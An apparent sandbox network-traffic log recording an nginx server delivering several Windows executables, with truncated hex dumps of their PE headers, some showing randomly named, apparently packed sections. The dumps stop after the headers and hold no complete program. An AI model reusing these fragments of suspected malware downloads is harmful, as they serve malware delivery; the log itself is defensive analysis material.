Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Feb 2025 16:46:27 GMTContent-Type: application/octet-streamContent-Length: 816640Last-Modified: Thu, 06 Feb 2025 17:47:21 GMTConnection: keep-aliveETag: "67a4f5a9-c7600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 76 74 9e df 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 30 00 00 40 02 00 00 08 00 00 00 00 00 00 6e 5e 02 00 00 20 00 00 00 60 02 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 0c 00 00 06 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 20 5e 02 00 4b 00 00 00 00 60 02 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 02 00 0c 00 00 00 d4 5d 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 3e 02 00 00 20 00 00 00 40 02 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 98 05 00 00 00 60 02 00 00 06 00 00 00 46 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 02 00 00 02 00 00 00 4c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 64 61 74 61 00 00 00 14 05 00 00 a0 02 00 00 14 05 00 00 4e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 00 00 00 14 05 00 00 c0 07 00 00 14 05 00 00 62 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Feb 2025 16:46:32 GMTContent-Type: application/octet-streamContent-Length: 116736Last-Modified: Fri, 07 Feb 2025 15:24:22 GMTConnection: keep-aliveETag: "67a625a6-1c800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 07 af a5 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 1e 01 00 00 a8 00 00 00 00 00 00 c9 3d 01 00 00 20 00 00 00 40 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 02 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7f 3d 01 00 4a 00 00 00 00 40 01 00 9a a5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cf 1d 01 00 00 20 00 00 00 1e 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 9a a5 00 00 00 40 01 00 00 a6 00 00 00 20 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 02 00 00 02 00 00 00 c6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 af 3d 01 00 00 00 00 00 48 00 00 00 02 00 05 00 c4 44 00 00 10 4e 00 00 0b 00 00 00 30 00 00 06 d4 92 00 00 ab aa 00 00 44 44 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 50 00 00 00 01 00 00 11 16 2b 40 7e 3d 00 00 04 2b 3c 2b 41 06 2c 1a 7e 3e 00 00 04 7e 01 00 00 04 20 f1 00 00 00 28 b1 00 00 06 28 c1 00 00 06 2a 7e 3e 00 00 04 7e 01 00 00 04 20 0e 01 00 00 28 b1 00 00 06 28 c1 00 00 06 2a 0a 2b bd 28 be 00 00 06 2b bd 0a 2b bc 1e 02 28 42 00 00 0a 2a 62 d0 02 00 00 02 2b 03 2b 08 2a 28 23 00 00 0a 2b f6 28 b6 00 00 06 2b f1 00 00 00 13 30 04 00 c3 00 00 00 02 00 00 11 12 00 18 1f 14 16 38 9a 00 00 00 12 01 18 1f 13 16 38 99 00 00 00 12 02 18 1f 13 16 38 98 00 00 00 7e 3f 00 00 04 06 07 28 c4 00 00 06 2c 1b 7e 3e 00 00 04 7e 02 00 00 04 20 30 01 00 00 28 b1 00 00 06 28 c1 00 00 06 2b 19 7e 3e 00 00 04 7e 02 00 00 04 20 6d 01 00 00 28 b1 00 00 06 28 c1 00 00 06 7e 3f 00 00 04 07 08 28 c4 00 00 06 2c 1a 7e 3e 00 00 04 7e 02 00 00 04 20 ae 01 00 00 28 b1 00 00 06 28 c1 00 00 06 2a 7e 3e 00 00 04 7e 02 00 00 04 20 eb 01 00 00 28 b1 00 00 06 28 c1 00 00 06 2a 28 43 00 00 0a 38 5c ff ff ff 28 4
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Feb 2025 16:46:45 GMTContent-Type: application/octet-streamContent-Length: 961024Last-Modified: Fri, 07 Feb 2025 16:02:14 GMTConnection: keep-aliveETag: "67a62e86-eaa00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 72 2e a6 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 fa 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 00 0f 00 00 04 00 00 19 85 0f 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 4c 3e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0e 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 4c 3e 01 00 00 40 0d 00 00 40 01 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 80 0e 00 00 76 00 00 00 34 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Feb 2025 16:46:49 GMTContent-Type: application/octet-streamContent-Length: 2727936Last-Modified: Fri, 07 Feb 2025 16:03:04 GMTConnection: keep-aliveETag: "67a62eb8-29a000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 0a 00 00 00 00 00 00 00 00 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2a 00 00 04 00 00 90 93 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 68 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 68 06 00 00 00 60 00 00 00 04 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 36 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 68 63 79 66 6e 71 66 61 00 40 29 00 00 a0 00 00 00 40 29 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 70 61 71 72 71 73 6a 00 20 00 00 00 e0 29 00 00 06 00 00 00 78 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 00 2a 00 00 22 00 00 00 7e 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Feb 2025 16:47:01 GMTContent-Type: application/octet-streamContent-Length: 1888256Last-Modified: Fri, 07 Feb 2025 02:54:38 GMTConnection: keep-aliveETag: "67a575ee-1cd000"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 12 25 9e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 66 04 00 00 ae 00 00 00 00 00 00 00 60 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 4a 00 00 04 00 00 da 70 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 90 05 00 6b 00 00 00 00 80 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 91 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 05 00 00 10 00 00 00 8a 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 80 05 00 00 02 00 00 00 9a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 05 00 00 02 00 00 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 a0 2a 00 00 a0 05 00 00 02 00 00 00 9e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 68 61 79 77 69 6d 63 00 10 1a 00 00 40 30 00 00 0a 1a 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 62 62 76 6b 75 68 70 00 10 00 00 00 50 4a 00 00 04 00 00 00 aa 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 60 4a 00 00 22 00 00 00 ae 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Feb 2025 16:47:05 GMTContent-Type: application/octet-streamContent-Length: 2727936Last-Modified: Fri, 07 Feb 2025 16:03:04 GMTConnection: keep-aliveETag: "67a62eb8-29a000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 0a 00 00 00 00 00 00 00 00 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2a 00 00 04 00 00 90 93 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 68 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 68 06 00 00 00 60 00 00 00 04 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 36 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 68 63 79 66 6e 71 66 61 00 40 29 00 00 a0 00 00 00 40 29 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 70 61 71 72 71 73 6a 00 20 00 00 00 e0 29 00 00 06 00 00 00 78 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 00 2a 00 00 22 00 00 00 7e 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Feb 2025 16:47:05 GMTContent-Type: application/octet-streamContent-Length: 2104320Last-Modified: Fri, 07 Feb 2025 16:05:04 GMTConnection: keep-aliveETag: "67a62f30-201c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 d0 49 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 4a 00 00 04 00 00 28 a4 20 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 58 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c b9 49 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4c b9 49 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 58 04 00 00 00 90 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 29 00 00 b0 06 00 00 02 00 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 6b 76 6c 6e 75 77 6d 00 60 19 00 00 60 30 00 00 5e 19 00 00 98 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 6a 66 67 63 67 72 62 00 10 00 00 00 c0 49 00 00 04 00 00 00 f6 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 49 00 00 22 00 00 00 fa 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Feb 2025 16:47:15 GMTContent-Type: application/octet-streamContent-Length: 2236416Last-Modified: Fri, 07 Feb 2025 16:18:20 GMTConnection: keep-aliveETag: "67a6324c-222000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 05 00 00 00 00 00 00 00 00 00 00 